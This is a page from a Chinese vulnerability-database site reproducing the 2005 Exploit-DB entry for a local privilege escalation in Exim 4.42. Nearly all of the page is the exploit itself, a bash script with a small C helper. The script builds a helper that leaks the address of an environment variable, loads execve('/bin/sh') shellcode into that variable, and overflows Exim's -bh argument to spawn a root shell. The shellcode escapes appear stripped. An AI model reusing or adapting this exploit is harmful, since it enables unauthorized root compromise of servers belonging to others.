Exim 4.42 – Local Privilege Escalation

Exim 4.42 – Local Privilege Escalation

漏洞ID 1054884 漏洞类型
发布时间 2005-02-07 更新时间 2005-02-07
图片[1]-Exim 4.42 – Local Privilege Escalation-安全小百科CVE编号 N/A
图片[2]-Exim 4.42 – Local Privilege Escalation-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/796
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/bin/sh

# Local Lame R00T sploit for exim <= 4.42
# by Dark Eagle
#  
# My First Coding Release In bash ))

# Unl0ck Research Team
# 
# More Effective than C-code.
#
# @env.c content:
#
###################################################
#  #include <stdio.h>
#  #include <string.h>
#  int main(int argc, char *argv[])
#  {
#  char *addr_ptr;
#  addr_ptr = getenv(argv[1]);
#  printf("%s @ %pn", argv[1], addr_ptr);
#  return 0;
#  }
###################################################

gcc @env.c -o @env

cp @env /usr/bin
cd /usr/exim/bin

CODE=`perl -e 'print "x31xc0x31xdbxb0x17xcdx80x31xc0x50x68x2fx2fx73x68x68x2fx62x69
x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80"'`;export CODE

@env CODE
echo "So, dude, starting..."
echo "NoW Just Type Address Of CODE"

read ADDRESS

echo "You are typed: $ADDRESS"

echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!"

./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'`

# milw0rm.com [2005-02-07]

相关推荐: Winamp路径名称泄露漏洞

Winamp路径名称泄露漏洞 漏洞ID 1204239 漏洞类型 未知 发布时间 2002-05-31 更新时间 2002-05-31 CVE编号 CVE-2002-0284 CNNVD-ID CNNVD-200205-111 漏洞平台 N/A CVSS评分 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享